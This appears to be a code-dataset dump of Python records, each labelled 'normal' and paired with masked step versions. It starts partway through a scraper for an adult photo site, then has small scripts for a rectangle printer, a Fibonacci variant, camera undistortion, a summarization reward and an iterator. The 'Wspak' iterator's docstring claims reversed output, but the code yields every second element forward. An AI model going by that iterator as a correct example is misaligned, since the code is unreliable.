albums_url.extend(self.category2albums(url))\n else:\n albums_url.append(url)\n albums = []\n urls = [{'url': url} for url in albums_url]\n threads = MultiRequest(urls=urls, name=url).run()\n for thread in threads:\n try:\n album = self.album2photos(thread.url, thread.response)\n if album is not None:\n albums.append(album)\n except SystemExit:\n sys.exit()\n except:\n albums.append({'error': {'url': thread.url, 'info':\n 'parse error'}})\n del thread\n return albums\n", "step-5": "import sys\nfrom photo_dl.request import request\nfrom photo_dl.request import MultiRequest\n\n\nclass Jav_ink:\n def __init__(self):\n self.parser_name = 'jav_ink'\n self.domain = 'https://www.jav.ink'\n self.album_flag = {}\n\n @staticmethod\n def category2albums(category_url):\n category_url = category_url[:category_url.find('/page/')]\n category_html = request(category_url)\n albums = category_html.xpath('//*[@id=\"infinite-articles\"]/li[contains(@class, \"post\")]/a/@href')\n pages = category_html.xpath('//*[@class=\"pages\"]/text()')\n if pages:\n pages = pages[0]\n pages = pages[pages.find('of') + 3:]\n urls = []\n for page in range(1, int(pages) + 1):\n urls.append('%s/page/%d/' % (category_url, page))\n urls = [{'url': url} for url in urls]\n threads = MultiRequest(urls=urls, progress=False).run()\n for thread in threads:\n albums.extend(thread.response.xpath('//*[@id=\"infinite-articles\"]\\\n /li[contains(@class, \"post\")]/a/@href'))\n del thread\n return albums\n\n def album2photos(self, album_url, album_html):\n photos = []\n album_id = album_html.xpath('//article/div/@id')\n if not album_id:\n return {'error': {'url': album_url, 'info': 'not supported'}}\n album_id = album_id[0]\n if album_id in self.album_flag:\n return\n self.album_flag[album_id] = 1\n\n album_name = album_html.xpath('//*[contains(@class, \"article-title\")]/text()')\n photos_html = album_html.xpath('//*[@class=\"gallery-item\"]')\n for photo_html in photos_html:\n photo_url = photo_html.xpath('.//a/@href')[0]\n photo_name = photo_url[photo_url.rfind('/') + 1:]\n photos.append({'photo_url': photo_url, 'photo_name': photo_name})\n if len(album_name) == 0:\n album_name = album_url.split('/')[-2]\n else:\n album_name = album_name[0]\n album = {'parser_name': self.parser_name, 'album_name': album_name, 'photos': photos}\n return album\n\n def url2albums(self, url):\n albums_url = []\n if '/category/' in url or '/?s=' in url:\n albums_url.extend(self.category2albums(url))\n else:\n albums_url.append(url)\n\n albums = []\n urls = [{'url': url} for url in albums_url]\n threads = MultiRequest(urls=urls, name=url).run()\n for thread in threads:\n try:\n album = self.album2photos(thread.url, thread.response)\n if album is not None:\n albums.append(album)\n except SystemExit:\n sys.exit()\n except:\n albums.append({'error': {'url': thread.url, 'info': 'parse error'}})\n del thread\n return albums\n", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
w = int(input("Width ?"))
h = int(input("Height ?"))

for b in range(1, w + 1):
    print("*", end='')
print("")

for i in range(1, h - 1):
    print("*", end='')
    for j in range(1, w - 1):
        print(" ", end='')
    print("*", end='')
    print("")

for b in range(1, w + 1):
    print("*", end='')
print("")
normal
{ "blob_id": "32b961f3971819fdbbe1a30fd7cf1883353c1854", "index": 2294, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor b in range(1, w + 1):\n print('*', end='')\nprint('')\nfor i in range(1, h - 1):\n print('*', end='')\n for j in range(1, w - 1):\n print(' ', end='')\n print('*', end='')\n print('')\nfor b in range(1, w + 1):\n print('*', end='')\nprint('')\n", "step-3": "w = int(input('Width ?'))\nh = int(input('Height ?'))\nfor b in range(1, w + 1):\n print('*', end='')\nprint('')\nfor i in range(1, h - 1):\n print('*', end='')\n for j in range(1, w - 1):\n print(' ', end='')\n print('*', end='')\n print('')\nfor b in range(1, w + 1):\n print('*', end='')\nprint('')\n", "step-4": "w = int(input(\"Width ?\"))\nh= int(input(\"Height ?\"))\n\n\nfor b in range(1,w+1):\n\tprint (\"*\", end='')\nprint(\"\")\n\n\nfor i in range(1,h-1):\n\tprint (\"*\", end='')\n\tfor j in range(1,w-1):\n\t\tprint (\" \", end='')\n\tprint (\"*\", end='')\n\tprint(\"\")\n\nfor b in range(1,w+1):\n\tprint (\"*\", end='')\nprint(\"\")", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
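For reference, a sample session with the rectangle program above (inputs chosen here for illustration): width 5 and height 4 produce a hollow 5x4 box.

Width ?5
Height ?4
*****
*   *
*   *
*****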
#!/bin/python3

import sys


def fibonacciModified(t1, t2, n):
    ti = t1
    ti_1 = t2
    for i in range(2, n):
        ti_2 = ti + ti_1 ** 2
        ti = ti_1
        ti_1 = ti_2
    # ti_1 holds the latest term; returning it (rather than ti_2)
    # avoids an unbound ti_2 when n <= 2 and the loop never runs.
    return ti_1


if __name__ == "__main__":
    t1, t2, n = input().strip().split(' ')
    t1, t2, n = [int(t1), int(t2), int(n)]
    result = fibonacciModified(t1, t2, n)
    print(result)
normal
{ "blob_id": "3838df627318b25767738da912f44e494cef40f3", "index": 6833, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range(2, n):\n ti_2 = ti + ti_1 ** 2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range(2, n):\n ti_2 = ti + ti_1 ** 2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\n\nif __name__ == '__main__':\n t1, t2, n = input().strip().split(' ')\n t1, t2, n = [int(t1), int(t2), int(n)]\n result = fibonacciModified(t1, t2, n)\n print(result)\n", "step-4": "import sys\n\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range(2, n):\n ti_2 = ti + ti_1 ** 2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\n\nif __name__ == '__main__':\n t1, t2, n = input().strip().split(' ')\n t1, t2, n = [int(t1), int(t2), int(n)]\n result = fibonacciModified(t1, t2, n)\n print(result)\n", "step-5": "#!/bin/python3\n\nimport sys\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range (2, n):\n ti_2 = ti + ti_1**2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\nif __name__ == \"__main__\":\n t1, t2, n = input().strip().split(' ')\n t1, t2, n = [int(t1), int(t2), int(n)]\n result = fibonacciModified(t1, t2, n)\n print(result)\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
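To sanity-check the recurrence t(i+2) = t(i) + t(i+1)^2 implemented above, a small worked example (sample values chosen here, not taken from the dataset):

# t1=0, t2=1, n=5:
#   t3 = 0 + 1**2 = 1
#   t4 = 1 + 1**2 = 2
#   t5 = 1 + 2**2 = 5
assert fibonacciModified(0, 1, 5) == 5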
import numpy as np
import cv2

from camera import load_K, load_camera_dist, load_camera_ret


def undistort_img(img):
    '''
    Return an undistorted image given previously calibrated parameters.
    Adapted from the OpenCV calibration docs.
    '''
    ret = load_camera_ret()  # calibration return value, kept for reference
    K = load_K()
    dist = load_camera_dist()
    h, w = img.shape[:2]

    new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K, dist, (w, h), 1, (w, h))
    img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)

    return img_undistorted
normal
{ "blob_id": "844c630d3fe2dda833064556228b524608cfece9", "index": 4671, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef undistort_img(img):\n \"\"\"\n Return an undistorted image given previous calibrated parameters \n References from OpenCV docs\n \"\"\"\n ret = load_camera_ret()\n K = load_K()\n dist = load_camera_dist()\n h, w = img.shape[:2]\n new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K, dist, (w, h),\n 1, (w, h))\n img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)\n return img_undistorted\n", "step-3": "import numpy as np\nimport cv2\nfrom camera import load_K, load_camera_dist, load_camera_ret\n\n\ndef undistort_img(img):\n \"\"\"\n Return an undistorted image given previous calibrated parameters \n References from OpenCV docs\n \"\"\"\n ret = load_camera_ret()\n K = load_K()\n dist = load_camera_dist()\n h, w = img.shape[:2]\n new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K, dist, (w, h),\n 1, (w, h))\n img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)\n return img_undistorted\n", "step-4": "import numpy as np\nimport cv2\n\nfrom camera import load_K, load_camera_dist, load_camera_ret\n\ndef undistort_img(img):\n '''\n Return an undistorted image given previous calibrated parameters \n References from OpenCV docs\n '''\n ret = load_camera_ret()\n K = load_K()\n dist = load_camera_dist()\n h,w = img.shape[:2]\n\n new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K,dist,(w,h),1,(w,h))\n img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)\n\n return img_undistorted\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
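A hedged driver for undistort_img from the row above; the file names are placeholders, and the camera module's loaders are assumed to return a calibrated intrinsic matrix K and distortion vector:

# Hypothetical usage: load a frame, undistort it, write the result back out.
import cv2

img = cv2.imread('frame.png')              # placeholder input path
undistorted = undistort_img(img)
cv2.imwrite('frame_undistorted.png', undistorted)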
from scipy.stats import rv_discrete
import torch
import torch.nn.functional as F
import numpy as np
from utils import *


def greedy_max(doc_length, px, sentence_embed, sentences, device,
               sentence_lengths, length_limit=200, lamb=0.2):
    '''
    prob: sum should be 1
    sentence embed: [doc_length, embed_dim]
    '''
    x = list(range(doc_length))
    px = px.cpu().numpy()
    score = px
    prob = 1
    summary_representation = []
    bias = np.ones(px.shape)
    selected = []
    wc = 0
    lengths = []
    summary = []
    while wc <= length_limit:
        sample = np.argmax(score)

        selected.append(sample)
        wc += sentence_lengths[sample]
        lengths.append(sentence_lengths[sample])
        summary.append(sentences[sample])

        summary_representation.append(sentence_embed[sample])
        s = torch.stack(summary_representation, 1).unsqueeze(0)
        all_sent = sentence_embed[:doc_length, :].unsqueeze(2)
        redundancy_score = torch.max(F.cosine_similarity(all_sent, s, 1), 1)[0].cpu().numpy()

        score = lamb * px - ((1 - lamb) * redundancy_score) + (1 - lamb) * bias
        for i_sel in selected:
            score[i_sel] = 0
        # print(len(selected))
    summary = '\n'.join(summary)
    # summary_representation = summary_representation.to(device)
    return summary, prob, selected


def greedy_nommr(doc_length, px, sentence_embed, sentences, device,
                 sentence_lengths, length_limit=200, lamb=0.2):
    '''
    prob: sum should be 1
    sentence embed: [doc_length, embed_dim]
    '''
    x = list(range(doc_length))
    px = px.cpu().numpy()
    score = px
    prob = 1
    bias = np.ones(px.shape)
    summary_representation = []

    selected = []
    wc = 0
    lengths = []
    summary = []
    while wc <= length_limit:
        sample = np.argmax(score)
        selected.append(sample)
        wc += sentence_lengths[sample]
        lengths.append(sentence_lengths[sample])
        summary.append(sentences[sample])

        for i_sel in selected:
            score[i_sel] = 0
    summary = '\n'.join(summary)
    return summary, prob, selected


def compute_reward(score_batch, input_lengths, output, sentences_batch,
                   reference_batch, device, sentence_lengths_batch,
                   number_of_sample=5, lamb=0.1):
    reward_batch = []
    rl_label_batch = torch.zeros(output.size()[:2]).unsqueeze(2)
    for i_data in range(len(input_lengths)):
        # summary_i = summary_embed[i_data]
        doc_length = input_lengths[i_data]
        scores = score_batch[i_data, :doc_length]
        sentence_lengths = sentence_lengths_batch[i_data]
        sentence_embed = output[:doc_length, i_data, :]
        sentences = sentences_batch[i_data]
        reference = reference_batch[i_data]

        # final_choice = None
        result, prob, selected = greedy_nommr(doc_length, scores, sentence_embed,
                                              sentences, device, sentence_lengths,
                                              lamb=lamb)
        reward_greedy = get_rouge_single(result, reference)

        result, prob, selected = greedy_max(doc_length, scores, sentence_embed,
                                            sentences, device, sentence_lengths,
                                            lamb=lamb)
        reward_hi = get_rouge_single(result, reference)
        final_choice = selected

        # print(reward_hi - reward_greedy)
        reward_batch.append(reward_hi - reward_greedy)
        rl_label_batch[final_choice, i_data, :] = 1

    reward_batch = torch.FloatTensor(reward_batch).unsqueeze(0).to(device)
    rl_label_batch = rl_label_batch.to(device)
    reward_batch.requires_grad_(False)

    return reward_batch, rl_label_batch
normal
{ "blob_id": "cc6e827eec5256ce0dbe13958b6178c59bcd94a7", "index": 8802, "step-1": "<mask token>\n\n\ndef compute_reward(score_batch, input_lengths, output, sentences_batch,\n reference_batch, device, sentence_lengths_batch, number_of_sample=5,\n lamb=0.1):\n reward_batch = []\n rl_label_batch = torch.zeros(output.size()[:2]).unsqueeze(2)\n for i_data in range(len(input_lengths)):\n doc_length = input_lengths[i_data]\n scores = score_batch[i_data, :doc_length]\n sentence_lengths = sentence_lengths_batch[i_data]\n sentence_embed = output[:doc_length, i_data, :]\n sentences = sentences_batch[i_data]\n reference = reference_batch[i_data]\n result, prob, selected = greedy_nommr(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_greedy = get_rouge_single(result, reference)\n result, prob, selected = greedy_max(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_hi = get_rouge_single(result, reference)\n final_choice = selected\n reward_batch.append(reward_hi - reward_greedy)\n rl_label_batch[final_choice, i_data, :] = 1\n reward_batch = torch.FloatTensor(reward_batch).unsqueeze(0).to(device)\n rl_label_batch = rl_label_batch.to(device)\n reward_batch.requires_grad_(False)\n return reward_batch, rl_label_batch\n", "step-2": "<mask token>\n\n\ndef greedy_max(doc_length, px, sentence_embed, sentences, device,\n sentence_lengths, length_limit=200, lamb=0.2):\n \"\"\"\n\tprob: sum should be 1\n\tsentence embed: [doc_length, embed_dim]\n\t\"\"\"\n x = list(range(doc_length))\n px = px.cpu().numpy()\n score = px\n prob = 1\n summary_representation = []\n bias = np.ones(px.shape)\n selected = []\n wc = 0\n lengths = []\n summary = []\n while wc <= length_limit:\n sample = np.argmax(score)\n selected.append(sample)\n wc += sentence_lengths[sample]\n lengths.append(sentence_lengths[sample])\n summary.append(sentences[sample])\n summary_representation.append(sentence_embed[sample])\n s = torch.stack(summary_representation, 1).unsqueeze(0)\n all_sent = sentence_embed[:doc_length, :].unsqueeze(2)\n redundancy_score = torch.max(F.cosine_similarity(all_sent, s, 1), 1)[0\n ].cpu().numpy()\n score = lamb * px - (1 - lamb) * redundancy_score + (1 - lamb) * bias\n for i_sel in selected:\n score[i_sel] = 0\n summary = '\\n'.join(summary)\n return summary, prob, selected\n\n\n<mask token>\n\n\ndef compute_reward(score_batch, input_lengths, output, sentences_batch,\n reference_batch, device, sentence_lengths_batch, number_of_sample=5,\n lamb=0.1):\n reward_batch = []\n rl_label_batch = torch.zeros(output.size()[:2]).unsqueeze(2)\n for i_data in range(len(input_lengths)):\n doc_length = input_lengths[i_data]\n scores = score_batch[i_data, :doc_length]\n sentence_lengths = sentence_lengths_batch[i_data]\n sentence_embed = output[:doc_length, i_data, :]\n sentences = sentences_batch[i_data]\n reference = reference_batch[i_data]\n result, prob, selected = greedy_nommr(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_greedy = get_rouge_single(result, reference)\n result, prob, selected = greedy_max(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_hi = get_rouge_single(result, reference)\n final_choice = selected\n reward_batch.append(reward_hi - reward_greedy)\n rl_label_batch[final_choice, i_data, :] = 1\n reward_batch = torch.FloatTensor(reward_batch).unsqueeze(0).to(device)\n rl_label_batch = rl_label_batch.to(device)\n 
reward_batch.requires_grad_(False)\n return reward_batch, rl_label_batch\n", "step-3": "<mask token>\n\n\ndef greedy_max(doc_length, px, sentence_embed, sentences, device,\n sentence_lengths, length_limit=200, lamb=0.2):\n \"\"\"\n\tprob: sum should be 1\n\tsentence embed: [doc_length, embed_dim]\n\t\"\"\"\n x = list(range(doc_length))\n px = px.cpu().numpy()\n score = px\n prob = 1\n summary_representation = []\n bias = np.ones(px.shape)\n selected = []\n wc = 0\n lengths = []\n summary = []\n while wc <= length_limit:\n sample = np.argmax(score)\n selected.append(sample)\n wc += sentence_lengths[sample]\n lengths.append(sentence_lengths[sample])\n summary.append(sentences[sample])\n summary_representation.append(sentence_embed[sample])\n s = torch.stack(summary_representation, 1).unsqueeze(0)\n all_sent = sentence_embed[:doc_length, :].unsqueeze(2)\n redundancy_score = torch.max(F.cosine_similarity(all_sent, s, 1), 1)[0\n ].cpu().numpy()\n score = lamb * px - (1 - lamb) * redundancy_score + (1 - lamb) * bias\n for i_sel in selected:\n score[i_sel] = 0\n summary = '\\n'.join(summary)\n return summary, prob, selected\n\n\ndef greedy_nommr(doc_length, px, sentence_embed, sentences, device,\n sentence_lengths, length_limit=200, lamb=0.2):\n \"\"\"\n\tprob: sum should be 1\n\tsentence embed: [doc_length, embed_dim]\n\t\"\"\"\n x = list(range(doc_length))\n px = px.cpu().numpy()\n score = px\n prob = 1\n bias = np.ones(px.shape)\n summary_representation = []\n selected = []\n wc = 0\n lengths = []\n summary = []\n while wc <= length_limit:\n sample = np.argmax(score)\n selected.append(sample)\n wc += sentence_lengths[sample]\n lengths.append(sentence_lengths[sample])\n summary.append(sentences[sample])\n for i_sel in selected:\n score[i_sel] = 0\n summary = '\\n'.join(summary)\n return summary, prob, selected\n\n\ndef compute_reward(score_batch, input_lengths, output, sentences_batch,\n reference_batch, device, sentence_lengths_batch, number_of_sample=5,\n lamb=0.1):\n reward_batch = []\n rl_label_batch = torch.zeros(output.size()[:2]).unsqueeze(2)\n for i_data in range(len(input_lengths)):\n doc_length = input_lengths[i_data]\n scores = score_batch[i_data, :doc_length]\n sentence_lengths = sentence_lengths_batch[i_data]\n sentence_embed = output[:doc_length, i_data, :]\n sentences = sentences_batch[i_data]\n reference = reference_batch[i_data]\n result, prob, selected = greedy_nommr(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_greedy = get_rouge_single(result, reference)\n result, prob, selected = greedy_max(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_hi = get_rouge_single(result, reference)\n final_choice = selected\n reward_batch.append(reward_hi - reward_greedy)\n rl_label_batch[final_choice, i_data, :] = 1\n reward_batch = torch.FloatTensor(reward_batch).unsqueeze(0).to(device)\n rl_label_batch = rl_label_batch.to(device)\n reward_batch.requires_grad_(False)\n return reward_batch, rl_label_batch\n", "step-4": "from scipy.stats import rv_discrete\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nfrom utils import *\n\n\ndef greedy_max(doc_length, px, sentence_embed, sentences, device,\n sentence_lengths, length_limit=200, lamb=0.2):\n \"\"\"\n\tprob: sum should be 1\n\tsentence embed: [doc_length, embed_dim]\n\t\"\"\"\n x = list(range(doc_length))\n px = px.cpu().numpy()\n score = px\n prob = 1\n summary_representation = []\n bias = np.ones(px.shape)\n selected = []\n wc = 
0\n lengths = []\n summary = []\n while wc <= length_limit:\n sample = np.argmax(score)\n selected.append(sample)\n wc += sentence_lengths[sample]\n lengths.append(sentence_lengths[sample])\n summary.append(sentences[sample])\n summary_representation.append(sentence_embed[sample])\n s = torch.stack(summary_representation, 1).unsqueeze(0)\n all_sent = sentence_embed[:doc_length, :].unsqueeze(2)\n redundancy_score = torch.max(F.cosine_similarity(all_sent, s, 1), 1)[0\n ].cpu().numpy()\n score = lamb * px - (1 - lamb) * redundancy_score + (1 - lamb) * bias\n for i_sel in selected:\n score[i_sel] = 0\n summary = '\\n'.join(summary)\n return summary, prob, selected\n\n\ndef greedy_nommr(doc_length, px, sentence_embed, sentences, device,\n sentence_lengths, length_limit=200, lamb=0.2):\n \"\"\"\n\tprob: sum should be 1\n\tsentence embed: [doc_length, embed_dim]\n\t\"\"\"\n x = list(range(doc_length))\n px = px.cpu().numpy()\n score = px\n prob = 1\n bias = np.ones(px.shape)\n summary_representation = []\n selected = []\n wc = 0\n lengths = []\n summary = []\n while wc <= length_limit:\n sample = np.argmax(score)\n selected.append(sample)\n wc += sentence_lengths[sample]\n lengths.append(sentence_lengths[sample])\n summary.append(sentences[sample])\n for i_sel in selected:\n score[i_sel] = 0\n summary = '\\n'.join(summary)\n return summary, prob, selected\n\n\ndef compute_reward(score_batch, input_lengths, output, sentences_batch,\n reference_batch, device, sentence_lengths_batch, number_of_sample=5,\n lamb=0.1):\n reward_batch = []\n rl_label_batch = torch.zeros(output.size()[:2]).unsqueeze(2)\n for i_data in range(len(input_lengths)):\n doc_length = input_lengths[i_data]\n scores = score_batch[i_data, :doc_length]\n sentence_lengths = sentence_lengths_batch[i_data]\n sentence_embed = output[:doc_length, i_data, :]\n sentences = sentences_batch[i_data]\n reference = reference_batch[i_data]\n result, prob, selected = greedy_nommr(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_greedy = get_rouge_single(result, reference)\n result, prob, selected = greedy_max(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_hi = get_rouge_single(result, reference)\n final_choice = selected\n reward_batch.append(reward_hi - reward_greedy)\n rl_label_batch[final_choice, i_data, :] = 1\n reward_batch = torch.FloatTensor(reward_batch).unsqueeze(0).to(device)\n rl_label_batch = rl_label_batch.to(device)\n reward_batch.requires_grad_(False)\n return reward_batch, rl_label_batch\n", "step-5": "from scipy.stats import rv_discrete\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nfrom utils import *\n\n\ndef greedy_max(doc_length,px,sentence_embed,sentences,device,sentence_lengths,length_limit=200,lamb=0.2):\n\t'''\n\tprob: sum should be 1\n\tsentence embed: [doc_length, embed_dim]\n\t'''\n\tx = list(range(doc_length))\n\tpx = px.cpu().numpy()\n\tscore=px\n\tprob = 1\n\tsummary_representation = []\n\tbias = np.ones(px.shape)\n\tselected = []\n\twc=0\n\tlengths=[]\n\tsummary = []\n\twhile wc<=length_limit:\n\t\tsample = np.argmax(score)\n\n\t\tselected.append(sample)\n\t\twc+=sentence_lengths[sample]\n\t\tlengths.append(sentence_lengths[sample])\n\t\tsummary.append(sentences[sample])\n\n\t\tsummary_representation.append(sentence_embed[sample])\n\t\ts = torch.stack(summary_representation,1).unsqueeze(0)\n\t\tall_sent = sentence_embed[:doc_length,:].unsqueeze(2)\n\t\tredundancy_score 
=torch.max(F.cosine_similarity(all_sent,s,1),1)[0].cpu().numpy()\n\n\t\tscore = lamb*px - ((1-lamb)*redundancy_score) + (1-lamb)*bias\n\t\tfor i_sel in selected:\n\t\t\tscore[i_sel] = 0\n\t\t# print(len(selected))\n\tsummary ='\\n'.join(summary)\n\t# summary_representation= summary_representation.to(device)\n\treturn summary, prob, selected\n\n\ndef greedy_nommr(doc_length,px,sentence_embed,sentences,device,sentence_lengths,length_limit=200,lamb=0.2):\n\t'''\n\tprob: sum should be 1\n\tsentence embed: [doc_length, embed_dim]\n\t'''\n\tx = list(range(doc_length))\n\tpx = px.cpu().numpy()\n\tscore=px\n\tprob = 1\n\tbias = np.ones(px.shape)\n\tsummary_representation = []\n\n\tselected = []\n\twc=0\n\tlengths = []\n\tsummary=[]\n\twhile wc<=length_limit:\n\n\t\tsample = np.argmax(score)\n\t\tselected.append(sample)\n\t\twc+=sentence_lengths[sample]\n\t\tlengths.append(sentence_lengths[sample])\n\t\tsummary.append(sentences[sample])\n\n\t\tfor i_sel in selected:\n\t\t\tscore[i_sel] = 0\n\tsummary = '\\n'.join(summary)\n\treturn summary, prob, selected\n\n\ndef compute_reward(score_batch,input_lengths,output,sentences_batch,reference_batch,device,sentence_lengths_batch,number_of_sample=5,lamb=0.1):\n\treward_batch = []\n\trl_label_batch = torch.zeros(output.size()[:2]).unsqueeze(2)\n\tfor i_data in range(len(input_lengths)):\n\t\t# summary_i = summary_embed[i_data]\n\t\tdoc_length = input_lengths[i_data]\n\t\tscores = score_batch[i_data,:doc_length]\n\t\tsentence_lengths = sentence_lengths_batch[i_data]\n\t\tsentence_embed = output[:doc_length,i_data,:]\n\t\tsentences = sentences_batch[i_data]\n\t\treference = reference_batch[i_data]\n\n\t\t# final_choice = None\n\t\tresult,prob,selected = greedy_nommr(doc_length,scores,sentence_embed,sentences,device,sentence_lengths,lamb = lamb)\n\t\treward_greedy = get_rouge_single(result,reference)\n\n\t\tresult,prob,selected = greedy_max(doc_length,scores,sentence_embed,sentences,device,sentence_lengths,lamb = lamb)\n\t\treward_hi = get_rouge_single(result,reference)\n\t\tfinal_choice = selected\n\n\t\t# print(reward_hi-reward_greedy)\n\t\treward_batch.append(reward_hi-reward_greedy)\n\t\trl_label_batch[final_choice,i_data,:] = 1\n\n\treward_batch = torch.FloatTensor(reward_batch).unsqueeze(0).to(device)\n\trl_label_batch = rl_label_batch.to(device)\n\treward_batch.requires_grad_(False)\n\n\treturn reward_batch,rl_label_batch\n\n\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
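A shape-level sketch of how compute_reward above might be driven. Every tensor here is random filler chosen only to show the expected layouts (scores [batch, max_doc_len], encoder output [max_doc_len, batch, embed_dim]); it also assumes utils.get_rouge_single is importable, since the row's code depends on it:

# Hypothetical smoke test with random tensors; shapes follow the function's indexing.
import torch

batch, max_len, embed_dim = 2, 10, 16
scores = torch.rand(batch, max_len)              # per-sentence scores
output = torch.rand(max_len, batch, embed_dim)   # sentence embeddings
input_lengths = [10, 8]                          # true doc lengths per example
sentence_lengths = [[12] * 10, [15] * 8]         # word counts per sentence
sentences = [['sent %d' % i for i in range(n)] for n in input_lengths]
references = ['reference summary one', 'reference summary two']

reward, rl_labels = compute_reward(scores, input_lengths, output, sentences,
                                   references, torch.device('cpu'),
                                   sentence_lengths)
print(reward.shape, rl_labels.shape)             # (1, batch), (max_len, batch, 1)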
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys

PY2 = sys.version_info[0] == 2

if PY2:
    text_type = unicode
    string_types = basestring,
else:
    text_type = str
    string_types = str,


def with_metaclass(meta, *bases):
    # This requires a bit of explanation: the basic idea is to make a dummy
    # metaclass for one level of class instantiation that replaces itself with
    # the actual metaclass.
    class metaclass(meta):
        def __new__(cls, name, this_bases, d):
            return meta(name, bases, d)
    return type.__new__(metaclass, 'temporary_class', (), {})
normal
{ "blob_id": "414cb9a173ac70ad9ad1fc540aec569321fd3f8b", "index": 9477, "step-1": "<mask token>\n\n\ndef with_metaclass(meta, *bases):\n\n\n class metaclass(meta):\n\n def __new__(cls, name, this_bases, d):\n return meta(name, bases, d)\n return type.__new__(metaclass, 'temporary_class', (), {})\n", "step-2": "<mask token>\nif PY2:\n text_type = unicode\n string_types = basestring,\nelse:\n text_type = str\n string_types = str,\n\n\ndef with_metaclass(meta, *bases):\n\n\n class metaclass(meta):\n\n def __new__(cls, name, this_bases, d):\n return meta(name, bases, d)\n return type.__new__(metaclass, 'temporary_class', (), {})\n", "step-3": "<mask token>\nPY2 = sys.version_info[0] == 2\nif PY2:\n text_type = unicode\n string_types = basestring,\nelse:\n text_type = str\n string_types = str,\n\n\ndef with_metaclass(meta, *bases):\n\n\n class metaclass(meta):\n\n def __new__(cls, name, this_bases, d):\n return meta(name, bases, d)\n return type.__new__(metaclass, 'temporary_class', (), {})\n", "step-4": "import sys\nPY2 = sys.version_info[0] == 2\nif PY2:\n text_type = unicode\n string_types = basestring,\nelse:\n text_type = str\n string_types = str,\n\n\ndef with_metaclass(meta, *bases):\n\n\n class metaclass(meta):\n\n def __new__(cls, name, this_bases, d):\n return meta(name, bases, d)\n return type.__new__(metaclass, 'temporary_class', (), {})\n", "step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport sys\n\nPY2 = sys.version_info[0] == 2\n\nif PY2:\n text_type = unicode\n string_types = basestring,\nelse:\n text_type = str\n string_types = str,\n\n\ndef with_metaclass(meta, *bases):\n # This requires a bit of explanation: the basic idea is to make a dummy\n # metaclass for one level of class instantiation that replaces itself with\n # the actual metaclass.\n class metaclass(meta):\n def __new__(cls, name, this_bases, d):\n return meta(name, bases, d)\n return type.__new__(metaclass, 'temporary_class', (), {})\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
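The compat shim above mirrors the six/Jinja2 idiom; a small demonstration (names here are illustrative) showing that the class body is evaluated exactly once, under the real metaclass:

# Demonstration: Widget ends up constructed by Meta, not by the dummy class.
class Meta(type):
    def __new__(mcs, name, bases, d):
        d['created_by'] = mcs.__name__
        return super(Meta, mcs).__new__(mcs, name, bases, d)

class Widget(with_metaclass(Meta, object)):
    pass

print(Widget.created_by)   # -> 'Meta'
print(type(Widget))        # -> <class 'Meta'>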
class Wspak:
    """Iterator returning values in reversed order.

    Note: as written, the index arithmetic (start at -2, step by +2)
    actually yields every second element in forward order (indices
    0, 2, 4, ...) rather than walking the data backwards.
    """

    def __init__(self, data):
        self.data = data
        self.index = -2
        self.i = len(data) - 1

    def __iter__(self):
        return self

    def __next__(self):
        if self.index >= self.i:
            raise StopIteration
        self.index = self.index + 2
        return self.data[self.index]


d = ["sdasda", "sdasdasd", "sdsad232", "dasda", "dsada"]
g = (2, 3, 4, 6, 7)
d = [x for x in Wspak(d)]
for x in Wspak(g):
    print(x)
print(d)
normal
